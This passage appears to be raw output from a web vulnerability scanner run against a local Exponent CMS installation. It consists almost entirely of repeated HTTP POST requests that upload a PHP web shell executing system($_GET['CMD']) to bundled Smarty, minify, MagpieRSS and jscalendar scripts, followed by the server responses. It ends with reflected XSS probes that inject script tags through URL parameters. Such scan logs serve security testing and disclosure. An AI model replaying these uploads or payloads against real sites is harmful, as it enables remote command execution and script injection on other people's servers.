max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.read_cache_file.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.rmdir.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.rm_auto.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:44 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.run_insert_handler.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:45 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.smarty_include_php.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:45 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.write_cache_file.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:45 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.write_compiled_include.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:45 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.write_compiled_resource.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:45 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.write_compiled_resource.php?ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:46 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Smarty/libs/internals/core.write_file.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:46 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/minify/minify.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.0 404 Not Found Date: Fri, 08 Oct 2010 22:27:46 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Connection: close Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/minify/minify.php?files=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.0 404 Not Found Date: Fri, 08 Oct 2010 22:27:46 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 25 Connection: close Content-Type: text/html File not found: shell.php ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/minify/minify.php?files=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.0 404 Not Found Date: Fri, 08 Oct 2010 22:27:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 25 Connection: close Content-Type: text/html File not found: shell.php ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/minify/lib/jsmin.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/magpie_debug.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 458 Content-Type: text/html
Notice: Undefined index: url in C:\xampp\xampplite\htdocs\exponent\external\magpierss\scripts\magpie_debug.php on line 13
RSS URL:

Notice: Undefined variable: rss in C:\xampp\xampplite\htdocs\exponent\external\magpierss\scripts\magpie_debug.php on line 40
NULL
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/magpie_debug.php?url=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 432 Content-Type: text/html
Warning: MagpieRSS: Failed to fetch shell.php (HTTP Error: Invalid protocol "") in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238
Error: MagpieRSS: Failed to fetch shell.php (HTTP Error: Invalid protocol "")
RSS URL:
bool(false)
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/magpie_simple.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:47 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 123 Content-Type: text/html
RSS URL:
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/magpie_simple.php?url=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:48 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 529 Content-Type: text/html
Warning: MagpieRSS: Failed to fetch shell.php (HTTP Error: Invalid protocol "") in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238
Channel:

RSS URL:
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/magpie_simple.php?expid=shell.php&ajax_action=shell.php&url=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:48 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 529 Content-Type: text/html
Warning: MagpieRSS: Failed to fetch shell.php (HTTP Error: Invalid protocol "") in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238
Channel:

RSS URL:
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/magpie_slashbox.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:48 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 166 Content-Type: text/html





----------------------------------------------------------------

Alert Name: Arbitrary File Event
POST /exponent/external/magpierss/scripts/magpie_slashbox.php?rss_url=shell.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

' + system($_GET['CMD']) + ''; ?>
------x--


HTTP/1.1 200 OK
Date: Fri, 08 Oct 2010 22:27:48 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 701
Content-Type: text/html




displaying: shell.php


Warning: MagpieRSS: Failed to fetch shell.php (HTTP Error: Invalid protocol "") in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238

Warning: Invalid argument supplied for foreach() in C:\xampp\xampplite\htdocs\exponent\external\magpierss\scripts\magpie_slashbox.php on line 56






----------------------------------------------------------------

Alert Name: Arbitrary File Event
POST /exponent/external/magpierss/scripts/simple_smarty.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

' + system($_GET['CMD']) + ''; ?>
------x--


HTTP/1.1 200 OK
Date: Fri, 08 Oct 2010 22:27:49 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 663
Content-Type: text/html


Warning: require_once(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.require-once]: failed to open stream: No such file or directory in C:\xampp\xampplite\htdocs\exponent\external\magpierss\scripts\simple_smarty.php on line 8

Fatal error: require_once() [function.require]: Failed opening required '/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.;C:\xampp\xampplite\php\PEAR') in C:\xampp\xampplite\htdocs\exponent\external\magpierss\scripts\simple_smarty.php on line 8
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/smarty_plugin/modifier.rss_date_parse.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/magpierss/scripts/plugins/modifier.rss_date_parse.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/jscalendar/calendar.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/jscalendar/calendar.php?section=shell.php&action=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:49 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/jscalendar/test.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:50 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: lang=en Content-Length: 3242 Content-Type: text/html Test for calendar.php

Calendar.php test

Select language:
bool(false)
---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/magpierss/scripts/magpie_debug.php?url=3135%00%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 435 Content-Type: text/html
Warning: MagpieRSS: Failed to fetch 3135 in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238
Error: MagpieRSS: Failed to fetch 3135 (HTTP Error: Invalid protocol "")
RSS URL:
bool(false)
---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/magpierss/scripts/magpie_simple.php?url=3137%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 569 Content-Type: text/html
Warning: MagpieRSS: Failed to fetch 3137 (HTTP Error: Invalid protocol "") in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238
Channel:

RSS URL:
---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/magpierss/scripts/magpie_simple.php?url=3139%00%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 511 Content-Type: text/html
Warning: MagpieRSS: Failed to fetch 3139 in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238
Channel:

RSS URL:
---------------------------------------------------------------- Alert Name: Reflected XSS GET /exponent/external/magpierss/scripts/magpie_slashbox.php?rss_url=3141%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 0 Cache-Control: max-age=0 Origin: null Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:32:30 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 761 Content-Type: text/html
displaying: 3141


Warning: MagpieRSS: Failed to fetch 3141 (HTTP Error: Invalid protocol "") in C:\xampp\xampplite\htdocs\exponent\external\magpierss\rss_fetch.inc on line 238

Warning: Invalid argument supplied for foreach() in C:\xampp\xampplite\htdocs\exponent\external\magpierss\scripts\magpie_slashbox.php on line 56






----------------------------------------------------------------

Alert Name: Reflected XSS
